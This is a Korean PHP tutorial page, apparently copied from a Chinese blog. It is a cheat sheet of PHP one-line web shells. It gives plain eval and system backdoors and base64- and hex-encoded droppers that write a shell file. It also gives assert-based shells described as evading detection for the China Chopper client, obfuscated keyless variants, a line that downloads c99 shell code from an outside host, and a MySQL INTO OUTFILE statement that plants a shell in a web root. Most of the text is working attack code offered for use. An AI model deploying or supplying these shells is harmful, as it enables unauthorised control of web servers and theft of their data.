> 백엔드 개발 > PHP 튜토리얼 > PHP 한 문장 트로이목마와 한문장 트로이목마 작성을 위한 SQL문 요약

PHP 한 문장 트로이목마와 한문장 트로이목마 작성을 위한 SQL문 요약

藏色散人
풀어 주다: 2023-04-07 14:42:01
앞으로
4337명이 탐색했습니다.

1. 기본 클래스에 대한 한마디 - 이 기능은 실제로 감지하기 매우 쉬운 검증 취약점으로 제한됩니다:

<?php @eval($_GET["code"])?>
<?php @system($_POST["cmd"])?>
로그인 후 복사

2. 인코딩 대체 유형:

<?php @fputs(fopen(base64_decode(&#39;bG9zdC5waHA=&#39;),w),base64_decode(&#39;PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==&#39;));?>
//会生成<?php @eval($_POST[&#39;lostwolf&#39;]);?>

<script language="php">@fputs(fopen(base64_decode(&#39;bG9zdC5waHA=&#39;),w),base64_decode(&#39;PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==&#39;));</script>
//php在html内部的一种嵌入方式

<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>


<?php
session_start();
$_POST[&#39;code&#39;] && $_SESSION[&#39;theCode&#39;] = trim($_POST[&#39;code&#39;]);
$_SESSION[&#39;theCode&#39;]&&preg_replace(&#39;\&#39;a\&#39;eis&#39;,&#39;e&#39;.&#39;v&#39;.&#39;a&#39;.&#39;l&#39;.&#39;(base64_decode($_SESSION[\&#39;theCode\&#39;]))&#39;,&#39;a&#39;);?>
로그인 후 복사

3. 기타 유형:

<?php $_GET[a]($_GET[b]);?>
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
<?php assert($_REQUEST["pass"]);?>     //菜刀连接 躲避检测 密码pass 
<?php substr(md5($_REQUEST[&#39;x&#39;]),28)==&#39;acd0&#39;&&eval($_REQUEST[&#39;pass&#39;]);?>
//菜刀提交  http://192.168.1.5/x.php?x=lostwolf  脚本类型:php  密码为 pass
로그인 후 복사

4. 다운로드 유형:

<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> 
<? echo file_get_contents("..//cfg_database.php");?> //显示某文件
<? eval ( file_get_contents("远程shell")) ?> //运行远程shell
로그인 후 복사

5. 키 없음 기능 유형:

<?php
$_="";
$_[+""]=&#39;&#39;;
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${&#39;_&#39;.$_}[&#39;_&#39;](${&#39;_&#39;.$_}[&#39;__&#39;]);?>
http://site/2.php?_=assert&__=eval($_POST[&#39;pass&#39;]) 密码是pass
<?$_="";$_[+""]=&#39;_&#39;;$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
로그인 후 복사

6. 보충 지식 포인트:

SQL(MySQL)로 문장 작성:

select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"
#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以
로그인 후 복사

PHP 관련 지식을 더 보려면 PHP 중국어 웹사이트를 방문하세요!

위 내용은 PHP 한 문장 트로이목마와 한문장 트로이목마 작성을 위한 SQL문 요약의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
php
원천:cnblogs.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿